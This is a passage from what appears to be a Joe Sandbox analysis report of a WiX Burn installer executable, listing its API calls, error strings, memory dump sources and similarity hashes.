• RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00470B65
Strings
• Failed to open policy key: %ls, name: %ls, xrefs: 00470B3A
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp, xrefs: 00470AEC, 00470B46
• Failed to open policy key: %ls, xrefs: 00470AE0
Similarity
• API ID: Close
• String ID: Failed to open policy key: %ls$Failed to open policy key: %ls, name: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\polcutil.cpp
• API String ID: 3535843008-840529963
• Opcode ID: b145da9f9181cb78c73b2fbc6c146efb26d57aadcb2ac1e83237a9d74fcc69d2
• Instruction ID: a40a45f624d8b6e852ff072c8d334889f502c78aabab5023eeea3904ab49b9d6
• Opcode Fuzzy Hash: b145da9f9181cb78c73b2fbc6c146efb26d57aadcb2ac1e83237a9d74fcc69d2
• Instruction Fuzzy Hash: 4B21D172A41325FBDB215ED48C46FDB7A28DB15728F118026FE0876191D2BCAF1096E9
APIs
• RegQueryValueExW.ADVAPI32(?,?,?,0041775F,?,Resume,00000000,?,?,00000001,?,00000000,00000000,00000024), ref: 00467CB6
Strings
Similarity
• API ID: QueryValue
• String ID: Error reading version registry value due to unexpected data type: %u$Failed to query registry key value.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
• API String ID: 3660427363-4169281069
• Opcode ID: b32474f52ce7408ba4098f60274c62d00568a339d22d38861501ae5833f6a3f7
• Instruction ID: 00e170bcaadf47f87b2509ebb5bc24c56e13704c2f7f8098420f5670af0c3e5c
• Opcode Fuzzy Hash: b32474f52ce7408ba4098f60274c62d00568a339d22d38861501ae5833f6a3f7
• Instruction Fuzzy Hash: 7411E976904548BBEB209A068C49EAF7A6DDFC5768F25407FBA04B7280F17C4E01D6BD
APIs
• CompareStringW.KERNEL32(0000007F,?,00000000,000000FF,00000000,000000FF,00000000,?,0047B210,00000000,00000000,00000000,00000000,00000000), ref: 0046DC74
Strings
• Failed to hash the string., xrefs: 0046DC37
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dictutil.cpp, xrefs: 0046DC0B
• Invalid dictionary - bucket size index is out of range, xrefs: 0046DBF7
Similarity
• API ID: CompareString
• String ID: Failed to hash the string.$Invalid dictionary - bucket size index is out of range$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dictutil.cpp
• API String ID: 1825529933-451009152
• Opcode ID: 68042592eacc7570f321763f43af57551a09ae7db16cd42b39d65a9d5d473f66
• Instruction ID: c7ab4b91135166851d102ad668eb51f4aa86afa4b42328d71244cee8e6d6523e
• Opcode Fuzzy Hash: 68042592eacc7570f321763f43af57551a09ae7db16cd42b39d65a9d5d473f66
• Instruction Fuzzy Hash: A421C131F40215BBCB10DF88DC85F5A7765FB16720F10021AF514AB2D0E7B9AD10DBAA
APIs
• CoCreateInstance.OLE32(004AA48C,00000000,00000001,004AA49C,00000000,00000000,00000000,?,?,?,00416708,00000000,?,?,00419037,000004A0), ref: 0046F243
Strings
Similarity
• API ID: CreateInstance
• String ID: Failed to determine if restart is required from WUA.$Failed to get WUA system information interface.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\wuautil.cpp
• API String ID: 542301482-2589206279
• Opcode ID: 27c761bd073b86d485441db83b334e126d8751db98750ea5e00a1859ffc8e2a7
• Instruction ID: 572f34490b1fe966732eaceae312f8007a39ec3f22efb6a590ccde22f8e21961
• Opcode Fuzzy Hash: 27c761bd073b86d485441db83b334e126d8751db98750ea5e00a1859ffc8e2a7
• Instruction Fuzzy Hash: C211D275740714BBDA019759DC0AF9F37699B86B10F1140AAF908BB2C0EBB85D41CAAE
APIs
• GetCurrentProcess.KERNEL32(00000214,00000120,000000B0,?,?,?,00000120,00000080,000004B0,00000080,00000200,00000214,000004A0,00000120,00000214,00000000), ref: 0047192A
  • Part of subcall function 00466F79: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,000001D0,00000001,00000120,?,?,?,00471936,00000000), ref: 00466F91
  • Part of subcall function 00466F79: GetProcAddress.KERNEL32(00000000), ref: 00466F98
  • Part of subcall function 00466F79: GetLastError.KERNEL32(?,?,?,00471936,00000000), ref: 00466FC0
  • Part of subcall function 004716E9: RegCloseKey.ADVAPI32(00000000,00020019,?,?,000001D0,00000001,00000120), ref: 004717C4
Strings
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 004719C6
• Failed to query 64-bit related bundles., xrefs: 004719B7
• Failed to query 32-bit related bundles., xrefs: 0047198A
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                          • String ID: Failed to query 32-bit related bundles.$Failed to query 64-bit related bundles.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                          • API String ID: 3109562764-165303569
                                                                                                                                                          • Opcode ID: 15e5b83053ad883ecabcd2ba2d17465edda8359a880cbec4f4fccf4a8a9e6d22
                                                                                                                                                          • Instruction ID: bcd3cb871bfea37ee2dd97c5e48ce62f4b7f0230f3e0212de8dd5fe97e5638d6
                                                                                                                                                          • Opcode Fuzzy Hash: 15e5b83053ad883ecabcd2ba2d17465edda8359a880cbec4f4fccf4a8a9e6d22
                                                                                                                                                          • Instruction Fuzzy Hash: 1321B6B5E01219ABCB51DFA9D845ADE7BF4AB08754F10411AF908F7340E7789A00CB94
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,IGNOREDEPENDENCIES,00000000,00000000,?,?,0041F35B,00000000,IGNOREDEPENDENCIES,00000000,00000000), ref: 004151ED
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\package.cpp, xrefs: 00415233
                                                                                                                                                          • Failed to copy the property value., xrefs: 00415221
                                                                                                                                                          • IGNOREDEPENDENCIES, xrefs: 004151A4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES$d:\a\wix\wix\src\burn\engine\package.cpp
                                                                                                                                                          • API String ID: 1825529933-292868319
                                                                                                                                                          • Opcode ID: 2fee0bdc1d37e9941b55264e02dc0caff0640f6658688d495319b78a015358f9
                                                                                                                                                          • Instruction ID: 672f4d494a7151d957684c2a27f9d2e5e8ef63a02a8a7854181eccb64e0780cf
                                                                                                                                                          • Opcode Fuzzy Hash: 2fee0bdc1d37e9941b55264e02dc0caff0640f6658688d495319b78a015358f9
                                                                                                                                                          • Instruction Fuzzy Hash: F1110832604605FBDB118B84CC45FDA77A0EF45720F6102B7FA18BB2D1D2B46C908B98
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00467B72: RegOpenKeyExW.KERNELBASE(?,00467B6E,00000000,00000000,00000003,00000000,?,?,00470A51,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 00467B9D
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,00416615,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002), ref: 004686B7
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open key: %ls, xrefs: 00468654
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00468663, 004686A0
                                                                                                                                                          • Failed to read value type: %ls/@%ls, xrefs: 00468691
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: Failed to open key: %ls$Failed to read value type: %ls/@%ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 47109696-1840309882
                                                                                                                                                          • Opcode ID: 335cd17012c564b4f2d41341e5df77bd5302b4b98b5c43f8ec584eec2107a588
                                                                                                                                                          • Instruction ID: 73a13548c88e60d9eff8d91c1f934aa4a3f21da12038b285fff356d4d5e97c21
                                                                                                                                                          • Opcode Fuzzy Hash: 335cd17012c564b4f2d41341e5df77bd5302b4b98b5c43f8ec584eec2107a588
                                                                                                                                                          • Instruction Fuzzy Hash: 6711EB36940214BBDB219F44CC0AFDE7B24DB05725F50415AFD047A1D1F6794E20A79E
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004050E3: FindFirstFileW.KERNELBASE(?,?,?,00000000), ref: 0040511E
                                                                                                                                                            • Part of subcall function 004050E3: FindClose.KERNEL32(00000000,?,00000000), ref: 0040512A
                                                                                                                                                          • SetFileAttributesW.KERNEL32(0044AFBC,?,0044AFBC,?,00477924,?,?,0044AFBC,?,?,?,00000000,00000000,00000000), ref: 0044D933
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0044AFBC,?,?,?,00000000,00000000,00000000), ref: 0044D93D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFind$AttributesCloseErrorFirstLast
                                                                                                                                                          • String ID: Failed to clear readonly bit on payload destination path: %ls$d:\a\wix\wix\src\burn\engine\apply.cpp
                                                                                                                                                          • API String ID: 1980345056-1326892428
                                                                                                                                                          • Opcode ID: d840630c0beb34f1e957a57d286b4ececc42822660989ec9e416ed21976b7c01
                                                                                                                                                          • Instruction ID: ae4e8168a646cefaef1be2b3d81661b403a1866ecede465d093f54406772564b
                                                                                                                                                          • Opcode Fuzzy Hash: d840630c0beb34f1e957a57d286b4ececc42822660989ec9e416ed21976b7c01
                                                                                                                                                          • Instruction Fuzzy Hash: CF11C2B3E01235B7EB216A958C45BAF6A5C9B41B60F154137BC54FB391D22C8D4086E9
                                                                                                                                                          APIs
                                                                                                                                                          • ReadFile.KERNEL32(00000008,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0046ECC1,00000000,?,00000008,00000000,?), ref: 00405199
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0046ECC1,00000000,?,00000008,00000000,?,?,?), ref: 004051A3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastRead
                                                                                                                                                          • String ID: Failed to read data from file handle.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 1948546556-1834244307
                                                                                                                                                          • Opcode ID: 07040f1398ecc51be11c4238575133a179fca894b805d09f3162f4b7ff3dcaba
                                                                                                                                                          • Instruction ID: 13a925188af6fa6cd62a82aec8ca4ac5b9c649133d569ca596bb88764387a2f9
                                                                                                                                                          • Opcode Fuzzy Hash: 07040f1398ecc51be11c4238575133a179fca894b805d09f3162f4b7ff3dcaba
                                                                                                                                                          • Instruction Fuzzy Hash: 0D01C433E40628BBD7209A988D85BAFB66CEB51B64F11413AFD04FB280D6789D005AE4
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046B065: SysAllocString.OLEAUT32(00000000), ref: 0046B079
                                                                                                                                                            • Part of subcall function 0046B065: VariantInit.OLEAUT32(?), ref: 0046B085
                                                                                                                                                            • Part of subcall function 0046B065: VariantClear.OLEAUT32(?), ref: 0046B174
                                                                                                                                                            • Part of subcall function 0046B065: SysFreeString.OLEAUT32(00000000), ref: 0046B17F
                                                                                                                                                          • SysFreeString.OLEAUT32(00000001), ref: 0046B416
                                                                                                                                                          Strings
                                                                                                                                                          • failed XmlGetAttribute, xrefs: 0046B3AC
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B3BB
                                                                                                                                                          • Failed to treat attribute value as UInt64., xrefs: 0046B3E5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$FreeVariant$AllocClearInit
                                                                                                                                                          • String ID: Failed to treat attribute value as UInt64.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlGetAttribute
                                                                                                                                                          • API String ID: 3379191133-877610536
                                                                                                                                                          • Opcode ID: f09920795a8ed63b332d5300d89813fee2c382e55fa2d745d28a46ef7472c18e
                                                                                                                                                          • Instruction ID: 987b00ecd3129dc65d0d1cbe0f60bd62f6ff08763a1b645ef89c919959ec8a50
                                                                                                                                                          • Opcode Fuzzy Hash: f09920795a8ed63b332d5300d89813fee2c382e55fa2d745d28a46ef7472c18e
                                                                                                                                                          • Instruction Fuzzy Hash: C2116D74E40318BFDB119F948C81A9EBB78EB15754F1080AAFD01AA382E7748E519AD5
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00467B72: RegOpenKeyExW.KERNELBASE(?,00467B6E,00000000,00000000,00000003,00000000,?,?,00470A51,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 00467B9D
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,004165D9,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00000214,00000000), ref: 00467B4B
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to open key: %ls, xrefs: 00467AE9
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp, xrefs: 00467AF8, 00467B34
                                                                                                                                                          • Failed to read value: %ls/@%ls, xrefs: 00467B25
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                          • String ID: Failed to open key: %ls$Failed to read value: %ls/@%ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 47109696-172966028
                                                                                                                                                          • Opcode ID: 1bf519c5ef46129239c21ecbc4e67d3050492fd75a926c3caee25c3961d5136c
                                                                                                                                                          • Instruction ID: b3cbae3e8fcee92ad893d42706dd3aab40dd8c02cf601aedc7a97c331f99f08e
                                                                                                                                                          • Opcode Fuzzy Hash: 1bf519c5ef46129239c21ecbc4e67d3050492fd75a926c3caee25c3961d5136c
                                                                                                                                                          • Instruction Fuzzy Hash: 31110A32984318B7DF225E44CC0BFDEBA249B04B2CF144056FB04751A4F27D4E20A79A
                                                                                                                                                          APIs
                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000), ref: 004056A3
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000,?,00000001,?,WixBundleOriginalSource,?,?,?), ref: 004056AD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                          • String ID: Failed to set file pointer.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 2976181284-1564447625
                                                                                                                                                          • Opcode ID: 89d3025ab08b659d9b4514372133f01f6506868492df7b366f591d310ff8d5cb
                                                                                                                                                          • Instruction ID: a0cc8b17b41d949ed6d2edb0cc867bc1871b624ddcb66bce9050f101d2f5d618
                                                                                                                                                          • Opcode Fuzzy Hash: 89d3025ab08b659d9b4514372133f01f6506868492df7b366f591d310ff8d5cb
                                                                                                                                                          • Instruction Fuzzy Hash: 220108B1A00228FBDB208F45DC49DAB7F7CDB04764F01406AFD08B7391E6349D00DAA4
                                                                                                                                                          APIs
                                                                                                                                                          • ControlService.ADVAPI32(00444505,00000001,?,00000000,00000000,?,?,?,?,?,?,00444505,00000000), ref: 0044464D
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00444505,00000000), ref: 00444657
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ControlErrorLastService
                                                                                                                                                          • String ID: Failed to stop wusa service.$d:\a\wix\wix\src\burn\engine\msuengine.cpp
                                                                                                                                                          • API String ID: 4114567744-12490674
                                                                                                                                                          • Opcode ID: 7822e3a64c89ffd0985ff62a8bfc5f634ba54232a86a63d181b042b3b2cfc6e3
                                                                                                                                                          • Instruction ID: 65caf6ea81e1ede53078b2ace96eb05e417811a483d1e52e857cc586892de881
                                                                                                                                                          • Opcode Fuzzy Hash: 7822e3a64c89ffd0985ff62a8bfc5f634ba54232a86a63d181b042b3b2cfc6e3
                                                                                                                                                          • Instruction Fuzzy Hash: 4401DD72B4022877E7109B559C45FAF76AC9B89B54F52013AFD04FB291E67C9C4045E8
                                                                                                                                                          APIs
                                                                                                                                                          • WriteFile.KERNEL32(0046EC8C,?,?,00000000,00000000,0046EC90,00000000,00000000,?,?,0046F0F2,0046EC8C,00000000,0046EC8C,?,?), ref: 00405C43
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0046F0F2,0046EC8C,00000000,0046EC8C,?,?,?,00000000,0046EC8C,0046EC8C,00000000), ref: 00405C4D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                          • String ID: Failed to write data to file handle.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 442123175-3789007561
                                                                                                                                                          • Opcode ID: 495c1b5883239babe03de4a2cb9e2a1d9d58ce258f2e836813d683b17b21dd76
                                                                                                                                                          • Instruction ID: d384bb13fb7dfcaf851ed18460492c1fa975961cd4a46915afd91a67d0308e9c
                                                                                                                                                          • Opcode Fuzzy Hash: 495c1b5883239babe03de4a2cb9e2a1d9d58ce258f2e836813d683b17b21dd76
                                                                                                                                                          • Instruction Fuzzy Hash: 1501B973A447287BE7209E988D89FAF776CDB41B64F51403AB904F7280D6789E0096E4
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,0040F92E,0100147D,?,?,00000000,00000000), ref: 00405829
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0040F92E,0100147D,?,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 00405833
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastSize
                                                                                                                                                          • String ID: Failed to get size of file.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                          • API String ID: 464720113-1502062690
                                                                                                                                                          • Opcode ID: c8e2d55dd3ce9d27782c65d7b700a5569759796316a18633ca3c6e13a9224a38
                                                                                                                                                          • Instruction ID: d28492828f7f859c0aa2f07d4b5979f250ccdc7006c0e85cecd66e345b4a7e4f
                                                                                                                                                          • Opcode Fuzzy Hash: c8e2d55dd3ce9d27782c65d7b700a5569759796316a18633ca3c6e13a9224a38
                                                                                                                                                          • Instruction Fuzzy Hash: 4E01D8B39416297BD7105B558C05AABBBACEF04764F11802BFD04BB380E7789D10CBE4
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 00420C60
                                                                                                                                                          • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?), ref: 00420CCB
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\core.cpp, xrefs: 00420C87
